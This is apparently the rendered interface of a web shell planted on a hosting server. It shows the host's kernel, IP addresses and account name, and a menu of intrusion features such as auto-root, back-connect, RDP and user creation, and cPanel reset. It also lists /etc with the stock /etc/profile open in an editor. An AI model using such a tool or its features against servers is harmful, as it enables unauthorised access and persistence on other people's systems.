Linux id-dci-web1980.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
LiteSpeed
: 153.92.8.146 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
8.3.30
u610877233
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
[ HOME SHELL ]
Name
Size
Permission
Action
alternatives
[ DIR ]
drwxr-xr-x
bash_completion.d
[ DIR ]
drwxr-xr-x
cl.nodejs
[ DIR ]
drwxr-xr-x
cl.php.d
[ DIR ]
drwxr-xr-x
cl.python
[ DIR ]
drwxr-xr-x
cl.selector
[ DIR ]
drwxr-xr-x
cl.selector.conf.d
[ DIR ]
drwxr-xr-x
crypto-policies
[ DIR ]
drwxr-xr-x
default
[ DIR ]
drwxr-xr-x
environment-modules
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
gcrypt
[ DIR ]
drwxr-xr-x
ld.so.conf.d
[ DIR ]
drwxr-xr-x
mail
[ DIR ]
drwxr-xr-x
mc
[ DIR ]
drwxr-xr-x
modulefiles
[ DIR ]
drwxr-xr-x
motd.d
[ DIR ]
drwxr-xr-x
openldap
[ DIR ]
drwxr-xr-x
pam.d
[ DIR ]
drwxr-xr-x
php.d
[ DIR ]
drwxr-xr-x
pki
[ DIR ]
drwxr-xr-x
profile.d
[ DIR ]
drwxr-xr-x
sasl2
[ DIR ]
drwxr-xr-x
scl
[ DIR ]
drwxr-xr-x
security
[ DIR ]
drwxr-xr-x
skel
[ DIR ]
drwxr-xr-x
ssh
[ DIR ]
drwxr-xr-x
ssl
[ DIR ]
drwxr-xr-x
subversion
[ DIR ]
drwxr-xr-x
sysconfig
[ DIR ]
drwxr-xr-x
.etc.version
3
B
-rw-------
DIR_COLORS
4.56
KB
-rw-r--r--
aliases
1.49
KB
-rw-r--r--
bashrc
2.6
KB
-rw-r--r--
environment
36
B
-rw-r--r--
group
403
B
-rw-r--r--
host.conf
9
B
-rw-r--r--
hosts
1.77
KB
-rw-r--r--
inputrc
943
B
-rw-r--r--
ld.so.cache
43.91
KB
-rw-r--r--
ld.so.conf
28
B
-rw-r--r--
localtime
114
B
-rw-r--r--
my.cnf
2.91
KB
-rw-r--r--
nsswitch.conf
2.07
KB
-rw-r--r--
odbc.ini
0
B
-rw-r--r--
odbcinst.ini
230
B
-rw-r--r--
passwd
976
B
-rw-r--r--
php.ini
60.67
KB
-rw-r--r--
profile
1.85
KB
-rw-r--r--
protocols
6.41
KB
-rw-r--r--
resolv.conf
124
B
-rw-r--r--
rpc
1.6
KB
-rw-r--r--
rsyncd.conf
458
B
-rw-r--r--
screenrc
6.56
KB
-rw-r--r--
services
676.58
KB
-rw-r--r--
shadow
740
B
----------
trusted-key.key
375
B
-rw-r--r--
vimrc
3.92
KB
-rw-r--r--
virc
1.16
KB
-rw-r--r--
wgetrc
4.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profile
# /etc/profile # System wide environment and startup programs, for login setup # Functions and aliases go in /etc/bashrc # It's NOT a good idea to change this file unless you know what you # are doing. It's much better to create a custom.sh shell script in # /etc/profile.d/ to make custom changes to your environment, as this # will prevent the need for merging in future updates. pathmunge () { case ":${PATH}:" in *:"$1":*) ;; *) if [ "$2" = "after" ] ; then PATH=$PATH:$1 else PATH=$1:$PATH fi esac } if [ -x /usr/bin/id ]; then if [ -z "$EUID" ]; then # ksh workaround EUID=`/usr/bin/id -u` UID=`/usr/bin/id -ru` fi USER="`/usr/bin/id -un`" LOGNAME=$USER MAIL="/var/spool/mail/$USER" fi # Path manipulation if [ "$EUID" = "0" ]; then pathmunge /usr/sbin pathmunge /usr/local/sbin else pathmunge /usr/local/sbin after pathmunge /usr/sbin after fi HOSTNAME=$(/usr/bin/hostnamectl --transient 2>/dev/null) || \ HOSTNAME=$(/usr/bin/hostname 2>/dev/null) || \ HOSTNAME=$(/usr/bin/uname -n) HISTSIZE=1000 if [ "$HISTCONTROL" = "ignorespace" ] ; then export HISTCONTROL=ignoreboth else export HISTCONTROL=ignoredups fi export PATH USER LOGNAME MAIL HOSTNAME HISTSIZE HISTCONTROL for i in /etc/profile.d/*.sh /etc/profile.d/sh.local ; do if [ -r "$i" ]; then if [ "${-#*i}" != "$-" ]; then . "$i" else . "$i" >/dev/null fi fi done unset i unset -f pathmunge if [ -n "${BASH_VERSION-}" ] ; then if [ -f /etc/bashrc ] ; then # Bash login shells run only /etc/profile # Bash non-login shells run only /etc/bashrc # Check for double sourcing is done in /etc/bashrc. . /etc/bashrc fi fi
Close